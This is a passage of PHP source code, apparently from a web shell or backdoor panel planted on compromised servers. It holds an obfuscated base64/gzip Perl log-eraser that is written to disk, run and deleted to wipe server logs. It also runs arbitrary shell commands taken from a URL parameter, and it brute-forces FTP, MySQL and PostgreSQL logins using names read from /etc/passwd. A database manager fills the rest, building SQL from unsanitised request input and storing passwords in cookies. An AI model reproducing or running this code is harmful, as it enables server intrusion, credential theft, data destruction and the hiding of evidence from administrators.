3928 $erase = gzinflate(base64_decode("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"));
3929 if(is_writable("."))
3930 {
3931 if($openp = fopen(getcwd()."/logseraser.pl", 'w'))
3932 {
3933 fwrite($openp, $erase);
3934 fclose($openp);
3935 passthru("perl logseraser.pl linux");
3936 unlink("logseraser.pl");
3937 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
3938 }
3939 } else
3940 {
3941 if($openp = fopen("/tmp/logseraser.pl", 'w'))
3942 {
3943 fwrite($openp, $erase)or die("Error");
3944 fclose($openp);
3945 $aidx = passthru("perl logseraser.pl linux");
3946 unlink("logseraser.pl");
3947 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
3948 }
3949 }
3950 }
3951 else
3952 {
3953 $check = shell_exec($_GET['mycmd']);
3954 echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
3955 }
3956}
3957else if(isset($_GET['prototype']))
3958{
3959 echo '<h1>Results</h1><div><span>Type:</span> '.htmlspecialchars($_GET['prototype']).' <span><br>Server:</span> '.htmlspecialchars($_GET['serverport']).'<br>';
3960 if( $_GET['prototype'] == 'ftp' )
3961 {
3962 function BruteFun($ip,$port,$login,$pass)
3963 {
3964 $fp = @ftp_connect($ip, $port?$port:21);
3965 if(!$fp) return false;
3966 $res = @ftp_login($fp, $login, $pass);
3967 @ftp_close($fp);
3968 return $res;
3969 }
3970 }
3971 elseif( $_GET['prototype'] == 'mysql' )
3972 {
3973 function BruteFun($ip,$port,$login,$pass)
3974 {
3975 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
3976 @mysql_close($res);
3977 return $res;
3978 }
3979 }
3980 elseif( $_GET['prototype'] == 'pgsql' )
3981 {
3982 function BruteFun($ip,$port,$login,$pass)
3983 {
3984 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
3985 $res = @pg_connect($str);
3986 @pg_close($res);
3987 return $res;
3988 }
3989 }
3990
3991 $success = 0;
3992 $attempts = 0;
3993 $server = explode(":", $_GET['server']);
3994 if($_GET['type'] == 1)
3995 {
3996 $temp = @file('/etc/passwd');
3997 if( is_array($temp))
3998 foreach($temp as $line)
3999 {
4000 $line = explode(":", $line);
4001 ++$attempts;
4002 if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) )
4003 {
4004 $success++;
4005 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
4006 }
4007 if(@$_GET['reverse'])
4008 {
4009 $tmp = "";
4010 for($i=strlen($line[0])-1; $i>=0; --$i)
4011 $tmp .= $line[0][$i];
4012 ++$attempts;
4013 if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) )
4014 {
4015 $success++;
4016 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
4017 }
4018 }
4019 }
4020 }
4021 elseif($_GET['type'] == 2)
4022 {
4023 $temp = @file($_GET['dict']);
4024 if( is_array($temp) )
4025 foreach($temp as $line)
4026 {
4027 $line = trim($line);
4028 ++$attempts;
4029 if(BruteFun($server[0],@$server[1], $_GET['login'], $line) )
4030 {
4031 $success++;
4032 echo '<b>'.htmlspecialchars($_GET['login']).'</b>:'.htmlspecialchars($line).'<br>';
4033 }
4034 }
4035 }
4036 echo "<span>Attempts:</span> <font class=txt>$attempts</font> <span>Success:</span> <font class=txt>$success</font></div>";
4037}
4038// Execute Query
4039else if(isset($_GET["executeit"]))
4040{
4041 if(isset($_GET['username']) && isset($_GET['server']))
4042 {
4043 $dbserver = $_GET['server'];
4044 $dbuser = $_GET['username'];
4045 $dbpass = $_GET['password'];
4046 if(mysql_connect($dbserver,$dbuser,$dbpass))
4047 {
4048 setcookie("dbserver", $dbserver);
4049 setcookie("dbuser", $dbuser);
4050 setcookie("dbpass", $dbpass);
4051
4052 listdatabase();
4053 }
4054 else
4055 echo "cannotconnect";
4056 }
4057}
4058else if(isset($_GET['action']) && isset($_GET['dbname']))
4059
4060
4061 {
4062 if($_GET['action'] == "createDB")
4063 {
4064 $dbname = $_GET['dbname'];
4065 $dbserver = $_COOKIE["dbserver"];
4066 $dbuser = $_COOKIE["dbuser"];
4067 $dbpass = $_COOKIE["dbpass"];
4068 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
4069 mysql_query("create database $dbname",$mysqlHandle);
4070 listdatabase();
4071 }
4072 if($_GET['action'] == 'dropDB')
4073 {
4074 $dbname = $_GET['dbname'];
4075 $dbserver = $_COOKIE["dbserver"];
4076 $dbuser = $_COOKIE["dbuser"];
4077 $dbpass = $_COOKIE["dbpass"];
4078 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
4079 mysql_query("drop database $dbname",$mysqlHandle);
4080 mysql_close($mysqlHandle);
4081 listdatabase();
4082 }
4083
4084 if($_GET['action'] == 'listTables')
4085 {
4086 listtable();
4087 }
4088
4089 // Create Tables
4090 if($_GET['action'] == "createtable")
4091 {
4092 $dbserver = $_COOKIE["dbserver"];
4093 $dbuser = $_COOKIE["dbuser"];
4094 $dbpass = $_COOKIE["dbpass"];
4095 $dbname = $_GET['dbname'];
4096 $tablename = $_GET['tablename'];
4097 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4098 mysql_select_db($dbname);
4099 mysql_query("CREATE TABLE $tablename ( no INT )");
4100 listtable();
4101 }
4102
4103 // Drop Tables
4104 if($_GET['action'] == "dropTable")
4105 {
4106 $dbserver = $_COOKIE["dbserver"];
4107 $dbuser = $_COOKIE["dbuser"];
4108 $dbpass = $_COOKIE["dbpass"];
4109 $dbname = $_GET['dbname'];
4110 $tablename = $_GET['tablename'];
4111 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4112 mysql_select_db($dbname);
4113 mysql_query("drop table $tablename");
4114 listtable();
4115 }
4116
4117 // Empty Tables
4118 if($_GET['action'] == "empty")
4119 {
4120 $dbserver = $_COOKIE["dbserver"];
4121 $dbuser = $_COOKIE["dbuser"];
4122 $dbpass = $_COOKIE["dbpass"];
4123 $dbname = $_GET['dbname'];
4124 $tablename = $_GET['tablename'];
4125 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4126 mysql_select_db($dbname);
4127 mysql_query("delete from $tablename");
4128 listtable();
4129 }
4130
4131 // Empty Tables
4132 if($_GET['action'] == "dropField")
4133 {
4134 $dbserver = $_COOKIE["dbserver"];
4135 $dbuser = $_COOKIE["dbuser"];
4136 $dbpass = $_COOKIE["dbpass"];
4137 $dbname = $_GET['dbname'];
4138 $tablename = $_GET['tablename'];
4139 $fieldname = $_GET['fieldname'];
4140 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4141 mysql_select_db($dbname);
4142 $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
4143 mysql_select_db( $dbname, $mysqlHandle );
4144 mysql_query( $queryStr , $mysqlHandle );
4145 listtable();
4146 }
4147
4148 if($_GET['action'] == 'viewdb')
4149 {
4150 listdatabase();
4151 }
4152
4153 // View Table Schema
4154 if($_GET['action'] == "viewSchema")
4155 {
4156 $dbserver = $_COOKIE["dbserver"];
4157 $dbuser = $_COOKIE["dbuser"];
4158 $dbpass = $_COOKIE["dbpass"];
4159 $dbname = $_GET['dbname'];
4160 $tablename = $_GET['tablename'];
4161 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4162 mysql_select_db($dbname);
4163 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4164 $pResult = mysql_query( "SHOW fields FROM $tablename" );
4165 $num = mysql_num_rows( $pResult );
4166 echo "<br><br><table align=center cellspacing=4 style='width:80%;' border=1>";
4167 echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
4168 for( $i = 0; $i < $num; $i++ )
4169 {
4170 $field = mysql_fetch_array( $pResult );
4171 echo "<tr>\n";
4172 echo "<td>".$field["Field"]."</td>\n";
4173 echo "<td>".$field["Type"]."</td>\n";
4174 echo "<td>".$field["Null"]."</td>\n";
4175 echo "<td>".$field["Key"]."</td>\n";
4176 echo "<td>".$field["Default"]."</td>\n";
4177 echo "<td>".$field["Extra"]."</td>\n";
4178 $fieldname = $field["Field"];
4179 echo "<td><a href=# onClick=\"viewtables('dropField','$dbname','$tablename','','','','$fieldname')\">Drop</a></td>\n";
4180 echo "</tr>\n";
4181 }
4182 echo "</table>";
4183 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4184 }
4185
4186 // Execute Query
4187 if($_GET['action'] == "executequery")
4188 {
4189 $dbserver = $_COOKIE["dbserver"];
4190 $dbuser = $_COOKIE["dbuser"];
4191 $dbpass = $_COOKIE["dbpass"];
4192 $dbname = $_GET['dbname'];
4193 $tablename = $_GET['tablename'];
4194 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4195 mysql_select_db($dbname);
4196 $result = mysql_query($_GET['executemyquery']);
4197
4198 // results
4199 echo "<html>\r\n". strtoupper($_GET['executemyquery']) . "<br>\r\n<table border =\"1\">\r\n";
4200
4201 $count = 0;
4202 while ($row = mysql_fetch_assoc($result))
4203 {
4204 echo "<tr>\r\n";
4205
4206 if ($count==0) // list column names
4207 {
4208 echo "<tr>\r\n";
4209 while($key = key($row))
4210 {
4211 echo "<td><b>" . $key . "</b></td>\r\n";
4212 next($row);
4213 }
4214 echo "</tr>\r\n";
4215 }
4216
4217 foreach($row as $r) // list content of column names
4218 {
4219 if ($r=='') $r = '<font >NULL</font>';
4220 echo "<td><font class=txt>" . $r . "</font></td>\r\n";
4221 }
4222 echo "</tr>\r\n";
4223 $count++;
4224 }
4225 echo "</table>\n\r<font class=txt size=3>" . $count . " rows returned.</font>\r\n</html>";
4226 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4227 }
4228
4229 // View Table Data
4230 if($_GET['action'] == "viewdata")
4231 {
4232 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
4233 $dbserver = $_COOKIE["dbserver"];
4234 $dbuser = $_COOKIE["dbuser"];
4235 $dbpass = $_COOKIE["dbpass"];
4236 $dbname = $_GET['dbname'];
4237 $tablename = $_GET['tablename'];
4238 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4239 ?>
4240 <br><br>
4241 <form>
4242 <table>
4243 <tr>
4244 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
4245 </tr>
4246 <tr>
4247 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
4248 </tr>
4249 </table>
4250 </form>
4251 <?php
4252 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4253 mysql_select_db($dbname);
4254
4255 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4256 $row = mysql_fetch_array($sql);
4257 $rowid = $row['COLUMN_NAME'];
4258
4259 echo "<br><font size=4 color =lime>Data in Table</font><br>";
4260 if( $tablename != "" )
4261 echo "<font size=3 class=txt>$dbname > $tablename</font><br>";
4262 else
4263 echo "<font size=3 class=txt>$dbname</font><br>";
4264
4265 $queryStr = "";
4266 $pag = 0;
4267 $queryStr = stripslashes( $queryStr );
4268 if( $queryStr == "" )
4269 {
4270 if(isset($_REQUEST['page']))
4271 {
4272 $res = mysql_query("select * from $tablename");
4273 $getres = mysql_num_rows($res);
4274 $coun = ceil($getres/30);
4275 if($_REQUEST['page'] != 1)
4276
4277 $pag = $_REQUEST['page'] * 30;
4278 else
4279 $pag = $_REQUEST['page'] * 30;
4280
4281 $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
4282 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
4283 $arrcount = 1;
4284 $arrdata[$arrcount] = 0;
4285 while($row = mysql_fetch_array($sql))
4286 {
4287 $arrdata[$arrcount] = $row[$rowid];
4288 $arrcount++;
4289 }
4290 }
4291 else
4292 {
4293 $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
4294 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
4295 $arrcount = 1;
4296 $arrdata[$arrcount] = 0;
4297 while($row = mysql_fetch_array($sql))
4298 {
4299 $arrdata[$arrcount] = $row[$rowid];
4300 $arrcount++;
4301 }
4302 }
4303 if( $orderby != "" )
4304 $queryStr .= " ORDER BY $orderby";
4305 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\"><font size=3>Schema</font></a>\n";
4306 }
4307
4308
4309 $pResult = mysql_query($queryStr );
4310 $fieldt = mysql_fetch_field($pResult);
4311 $tablename = $fieldt->table;
4312 $errMsg = mysql_error();
4313
4314 $GLOBALS[queryStr] = $queryStr;
4315
4316 if( $pResult == false )
4317 {
4318 echoQueryResult();
4319 return;
4320 }
4321 if( $pResult == 1 )
4322 {
4323 $errMsg = "Success";
4324 echoQueryResult();
4325 return;
4326 }
4327
4328 echo "<hr color='#1B1B1B'>\n";
4329
4330 $row = mysql_num_rows( $pResult );
4331 $col = mysql_num_fields( $pResult );
4332
4333 if( $row == 0 )
4334 {
4335 echo "<font size=3>No Data Exist!</font>";
4336 return;
4337 }
4338
4339 if( $rowperpage == "" ) $rowperpage = 30;
4340 if( $page == "" ) $page = 0;
4341 else $page--;
4342 mysql_data_seek( $pResult, $page * $rowperpage );
4343
4344 echo "<table cellspacing=1 cellpadding=5 border=1 align=center>\n";
4345 echo "<tr>\n";
4346 for( $i = 0; $i < $col; $i++ )
4347 {
4348 $field = mysql_fetch_field( $pResult, $i );
4349 echo "<th>";
4350 if($action == "viewdata")
4351 echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
4352 else
4353 echo $field->name."\n";
4354 echo "</th>\n";
4355 }
4356 echo "<th colspan=2>Action</th>\n";
4357 echo "</tr>\n";
4358 $num=1;
4359
4360
4361 $acount = 1;
4362
4363 for( $i = 0; $i < $rowperpage; $i++ )
4364 {
4365 $rowArray = mysql_fetch_row( $pResult );
4366 if( $rowArray == false ) break;
4367 echo "<tr>\n";
4368 $key = "";
4369 for( $j = 0; $j < $col; $j++ )
4370 {
4371 $data = $rowArray[$j];
4372
4373 $field = mysql_fetch_field( $pResult, $j );
4374 if( $field->primary_key == 1 )
4375 $key .= "&" . $field->name . "=" . $data;
4376
4377 if( strlen( $data ) > 30 )
4378 $data = substr( $data, 0, 30 ) . "...";
4379 $data = htmlspecialchars( $data );
4380 echo "<td>\n";
4381 echo "<font class=txt>$data</font>\n";
4382 echo "</td>\n";
4383 }
4384
4385 if(!is_numeric($arrdata[$acount]))
4386 echo "<td colspan=2>No Key</td>\n";
4387 else
4388 {
4389 echo "<td><a href=# onClick=\"viewtables('editData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Edit</a></td>\n";
4390 echo "<td><a href=# onClick=\"viewtables('deleteData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Delete</a></td>\n";
4391 $acount++;
4392 }
4393 }
4394 echo "</tr>\n";
4395
4396
4397 echo "</table>";
4398 if($arrcount > 30)
4399 {
4400 $res = mysql_query("select * from $tablename");
4401 $getres = mysql_num_rows($res);
4402 $coun = ceil($getres/30);
4403 echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
4404 for($i=0;$i<$coun;$i++)
4405 echo "<option value=$i>$i</option>";
4406
4407 echo "</select> <input type=button onClick=\"viewtables('viewdata','$dbname','$tablename','','','','',page.value)\" value=Go class=but></form>";
4408 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4409 }
4410 }
4411
4412 // Delete Table Data
4413 if($_GET['action'] == "deleteData")
4414 {
4415 $dbserver = $_COOKIE["dbserver"];
4416 $dbuser = $_COOKIE["dbuser"];
4417 $dbpass = $_COOKIE["dbpass"];
4418 $dbname = $_GET['dbname'];
4419 $tablename = $_GET['tablename'];
4420 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4421 mysql_select_db($dbname);
4422 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4423 $row = mysql_fetch_array($sql);
4424 $row = $row['COLUMN_NAME'];
4425 $rowid = $_GET[$row];
4426 mysql_query("delete from $tablename where $row = '$rowid'");
4427 listtable();
4428 }
4429 // Edit Table Data
4430 if($_GET['action'] == "editData")
4431 {
4432 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
4433 $dbserver = $_COOKIE["dbserver"];
4434 $dbuser = $_COOKIE["dbuser"];
4435 $dbpass = $_COOKIE["dbpass"];
4436 $dbname = $_GET['dbname'];
4437 $tablename = $_GET['tablename'];
4438 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4439 ?>
4440 <br><br>
4441 <form action="<?php echo $self; ?>" method="post">
4442 <?php
4443 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4444 mysql_select_db($dbname);
4445
4446 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4447 $row = mysql_fetch_array($sql);
4448 $row = $row['COLUMN_NAME'];
4449 $rowid = $_GET[$row];
4450
4451 $pResult = mysql_list_fields( $dbname, $tablename );
4452 $num = mysql_num_fields( $pResult );
4453
4454 $key = "";
4455 for( $i = 0; $i < $num; $i++ )
4456 {
4457 $field = mysql_fetch_field( $pResult, $i );
4458 if( $field->primary_key == 1 )
4459 if( $field->numeric == 1 )
4460 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
4461 else
4462 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
4463 }
4464 $key = substr( $key, 0, strlen($key)-4 );
4465
4466 mysql_select_db( $dbname, $mysqlHandle );
4467 $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle );
4468 $data = mysql_fetch_array( $pResult );
4469
4470 echo "<table cellspacing=1 cellpadding=2 border=1>\n";
4471 echo "<tr>\n";
4472 echo "<th>Name</th>\n";
4473 echo "<th>Type</th>\n";
4474 echo "<th>Function</th>\n";
4475 echo "<th>Data</th>\n";
4476 echo "</tr>\n";
4477
4478 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4479 $num = mysql_num_rows( $pResult );
4480
4481 $pResultLen = mysql_list_fields( $dbname, $tablename );
4482 $fundata1 = "'action','editsubmitData','dbname','".$dbname."','tablename','".$tablename."',";
4483 $fundata2 = "'action','insertdata','dbname','".$dbname."','tablename','".$tablename."',";
4484 for( $i = 0; $i < $num; $i++ )
4485 {
4486 $field = mysql_fetch_array( $pResult );
4487 $fieldname = $field["Field"];
4488 $fieldtype = $field["Type"];
4489 $len = mysql_field_len( $pResultLen, $i );
4490
4491 echo "<tr>";
4492 echo "<td>$fieldname</td>";
4493 echo "<td>".$field["Type"]."</td>";
4494 echo "<td>\n";
4495 echo "<select name=${fieldname}_function class=sbox>\n";
4496 echo "<option>\n";
4497 echo "<option>ASCII\n";
4498 echo "<option>CHAR\n";
4499 echo "<option>SOUNDEX\n";
4500 echo "<option>CURDATE\n";
4501 echo "<option>CURTIME\n";
4502 echo "<option>FROM_DAYS\n";
4503 echo "<option>FROM_UNIXTIME\n";
4504 echo "<option>NOW\n";
4505 echo "<option>PASSWORD\n";
4506 echo "<option>PERIOD_ADD\n";
4507 echo "<option>PERIOD_DIFF\n";
4508 echo "<option>TO_DAYS\n";
4509 echo "<option>USER\n";
4510 echo "<option>WEEKDAY\n";
4511 echo "<option>RAND\n";
4512 echo "</select>\n";
4513 echo "</td>\n";
4514 $value = htmlspecialchars($data[$i]);
4515 $type = strtok( $fieldtype, " (,)\n" );
4516 if( $type == "enum" || $type == "set" )
4517 {
4518 echo "<td>\n";
4519 if( $type == "enum" )
4520 echo "<select name=$fieldname class=box>\n";
4521 else if( $type == "set" )
4522 echo "<select name=$fieldname size=4 class=box multiple>\n";
4523 while( $str = strtok( "'" ) )
4524 {
4525 if( $value == $str )
4526 echo "<option selected>$str\n";
4527 else
4528 echo "<option>$str\n";
4529 strtok( "'" );
4530 }
4531 echo "</select>\n";
4532 echo "</td>\n";
4533 }
4534 else
4535 {
4536 if( $len < 40 )
4537 echo "<td><input type=text size=40 maxlength=$len id=dhanush_$fieldname name=sql_$fieldname value=\"$value\" class=box></td>\n";
4538 else
4539 echo "<td><textarea cols=47 rows=3 maxlength=$len name=dhanush_$fieldname class=box>$value</textarea>\n";
4540 }
4541 $fundata1 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
4542 $fundata2 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
4543 echo "</tr>";
4544 }
4545 $fundata1=eregi_replace(',$', '', $fundata1);
4546 $fundata2=eregi_replace(',$', '', $fundata2);
4547
4548 echo "</table><p>\n";
4549 echo "<input type=button onClick=\"editdata($fundata1)\" value='Edit Data' class=but>\n";
4550 echo "<input type=button value='Insert' onClick=\"editdata($fundata2)\" class=but>\n";
4551 echo "</form>\n";
4552 }
4553 }
4554// Edit Submit Table Data
4555else if($_REQUEST['action'] == "editsubmitData")
4556{
4557 $dbserver = $_COOKIE["dbserver"];
4558 $dbuser = $_COOKIE["dbuser"];
4559 $dbpass = $_COOKIE["dbpass"];
4560 $dbname = $_POST['dbname'];
4561 $tablename = $_POST['tablename'];
4562
4563 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4564 mysql_select_db($dbname);
4565
4566 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4567 $row = mysql_fetch_array($sql);
4568 $row = $row['COLUMN_NAME'];
4569 $rowid = $_POST[$row];
4570
4571 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4572 $num = mysql_num_rows( $pResult );
4573
4574 $rowcount = $num;
4575
4576 $pResultLen = mysql_list_fields( $dbname, $tablename );
4577
4578 for( $i = 0; $i < $num; $i++ )
4579 {
4580 $field = mysql_fetch_array( $pResult );
4581 $fieldname = $field["Field"];
4582 $arrdata = $_REQUEST[$fieldname];
4583
4584 $str .= " " . $fieldname . " = '" . $arrdata . "'";
4585 $rowcount--;
4586 if($rowcount != 0)
4587 $str .= ",";
4588 }
4589
4590 $str = "update $tablename set" . $str . " where $row=$rowid";
4591 mysql_query($str);
4592 ?><div id="showsql"></div><?php
4593}
4594// Insert Table Data
4595else if($_REQUEST['action'] == "insertdata")
4596{
4597 $dbserver = $_COOKIE["dbserver"];
4598 $dbuser = $_COOKIE["dbuser"];
4599 $dbpass = $_COOKIE["dbpass"];
4600 $dbname = $_POST['dbname'];
4601 $tablename = $_POST['tablename'];
4602
4603 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4604 mysql_select_db($dbname);
4605
4606 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4607 $row = mysql_fetch_array($sql);
4608 $row = $row['COLUMN_NAME'];
4609 $rowid = $_POST[$row];
4610
